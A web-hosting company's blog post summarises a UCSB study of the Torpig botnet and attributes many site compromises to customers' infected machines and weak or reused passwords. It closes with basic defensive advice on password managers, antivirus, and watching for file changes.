Mod-Security Override No Longer Works
Social Media Interfaces Expanded

UCSB Studies Botnet and Conclude Its Partially Your Fault

Image via Wikipedia
While the title of this is a joke, somewhat, I read a fascinating white paper published by the University of California, Santa Barbara that outlined something near and dear to my heart - security. The White Paper is located here, and while I recommend that everyone reads it, I also realize that most of you would start and then your eyes would glaze over in stark incomprehension, so lets hit the high points with regard to how what they found relates to you, and to us. In short, UCSB managed to take over the Torpig Botnet for 10 days, and were able to study precisely how it infects, what it does, what it collects, how it communicates, and perhaps most relevant to you as Internet citizens, how you people make it easier for the Botnet to exploit and steal your sensitive information and use your sites to infect others. Torpig starts on legitimate web sites - your web sites, our web sites, any web sites it can get to. The HTML is modified without your knowledge to include Javascript that instructs the web site visitor to download exploits that then infect their machine if it can. Eventually, the payload end results into the replacement of your applications with infected ones. UCSB found that in addition to replacing Windows system files, the botnet replaces: Internet Explorer, Firefox, Opera, and FTP clients like Leech-FTP and CuteFTP, and email clients like Thunderbird and Outlook and Eudora, and Instant Messengers like Skype and ICQ... Yeah, it takes over. Silently. The #1 Exploit we see, the #1 thing that we see happen to people's web sites, the #1 thing that people have done to their sites is an FTP Exploit. And I don't mean we get hacked. I mean computers from all over the Internet log in via FTP with legitimate credentials you picked and you store and you use, and begin changing your HTML Code, and uploading phishing pages to your site. And hopefully we find them - and then we suspend you. And you call us up and scream at us because you assume that its our server that got exploited - after all, there is the phishing page on your site! For about a year now, I have had a mechanical, monotonous speech that I can rattle off in an attempt to explain that no one brute forced into your web site. We automatically firewall people so fast that the chances of that happening are next to nil. The cracker would have to be incredibly insightful, or incredibly lucky, to brute force or crack a password, because you try 5 times and we nuke you. OK, or we left the firewall off - but we don't leave the firewall off. I know, sitting there, that the person yelling at me likely has their hands resting on a keyboard connected to a compromised machine, or gave the passwords to someone on a compromised machine. I also know that the chances of them believing me are next to nothing. They don't see it, so they don't believe it, and its not THEIR machine acting funny, its their site. To be frank, folks, this study feels like vindication. I have the urge to bold "I told you so! Sheesh!" and do the nyah nyah nyah dance. The fact is, though, its really not something I am jubilant about - we lose those clients, either because they leave in a huff or we ask them to leave because they cannot and will not abide by the security protocols we require and will not disinfect their machine (or they send us a printout showing rootkits were found by the virus program but were "disinfected" or "quarantined" so we should let them back on). We're a business. We don't like to lose clients, and we don't like to lose money, so this situation isn't really vindication - but it does give us documented proof that the security of your site in many respects rests as much with you and your behavior on the Internet as it does with us. UCSB studied you all, too. :) And they came up with some conclusions. Out of the infections they studied, 10% of you actually discussed and were concerned about security - and yet had no idea the machines you were discussing security on were machines that were were infected. 28% of the victims re-used passwords. 40% of you used passwords that were so weak, they could be hacked in less than a minute - they shoved 173,686 passwords into a cracker, and in 65 minutes, got 56,000 passwords back. Another 14,000 were recovered in the 10 minutes after that - and 30,000 additional passwords were recovered in the next 24 hours. That's 6.9 passwords a minute. That's 8.6 seconds per password on average. Eight Point Six Seconds Per Password on Average We employ a lot of security to try and stop attacks and exploitations. We use suPHP, mod-security application firewall, a software firewall, obscenely long passwords and changed ports, forced password strength, and a number of other things to to try and make the servers secure. Our rules and requirements on behavior here on our boxes are much stricter than many, many other hosts, and we don't apologize for that - we're not the host for everyone. You can't do whatever you want here. Our servers run well, and our sites and servers crash much less than many other hosts. There's a reason for that. We are, though, only part of the equation and our implementations can only do so much. Your Internet behavior, your personal security practices, are paramount in keeping your site safe, and this is one of the single most common exploits we see - and as you can see from how this actually happens, there's not a darn thing we can do to prevent it. It's up to you - your practices, your password choices, your security software. So, now that we've lectured you, what do we do to keep our computers safe?
  1. Keepass - KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish). We do not store passwords in plain text, in software programs, in browsers. Nada. They are all encrypted, so if we're ever exploited, they're not "get-able", at least for now. (There is 1Password for Macs - thanks to Adam for reminding me that its not entirely the Windows people's fault - though it mostly is. :P)
  2. Kaspersky - We never, ever, ever run without Kasperky Internet Security. Ever. It's my personal favorite, and if I could get it for my house itself, I would. One of the biggest problems we see is that people have a virus and malware scanner running weekly or so, but they run rampant all over the Internet with no constant firewall protection that gets things as they come in. If you run with a scanner, and it shows a rootkit, I don't care WHAT your program says about how it quarantined this file and that file - you are very likely screwed already, to put it bluntly. If you have a rootkit, you nuke and rebuild (and overwriting and wiping the drive with dban for good measure is a good idea). Anything less is false security. The infection will very likely reinsert itself at the first possible chance it has. You don't have to use what we use, but you need to use something all the time, every day, whenever you are connected to the Internet. Always. Without exception. And keep it updated.
  3. Use Strong & Different Passwords for EVERYTHING - If I had a dime for everyone who asked me to change their password to something like pencil1 in cPanel (like their password is in billing), I could retire. My rule is if you can easily remember it, it's bad. Use a site like password meter to learn what a good password is, or to generate one - Keepass is awesome for this as well, as it generates them for you as well as remembers them in an encrypted format. But whatever you do, don't use pencil1 on everything. Oy vey. Please, don't.
  4. Don't store passwords unencrypted - The programs that let you save passwords are convenient, aren't they? Yep, they are - and for more than just you. If you wouldn't post it on a web site, don't store it plain text.
  5. Know Your Site - Actually look at the file change dates on your site once in a while - did you last update that file in September 2008? Well, then why does it have an April 29, 2009 last updated date? Look at the code. If you find you were infected, CHANGE your passwords. Contact us and let us know that you need us to monitor your site for file changes, and we will, just to be sure.
These are small things you can do that make it much, much harder for you, your computer, and your site to be exploited. We've said it before, and we'll say it again - these botnets don't want you to know what they are doing. They want to use your computer for as long as they can to get as much information as they can to infect other people. They want your site to run as long as it can, infecting as many as they can. Don't make it easy for them.


Feed You can follow this conversation by subscribing to the comment feed for this post.

The comments to this entry are closed.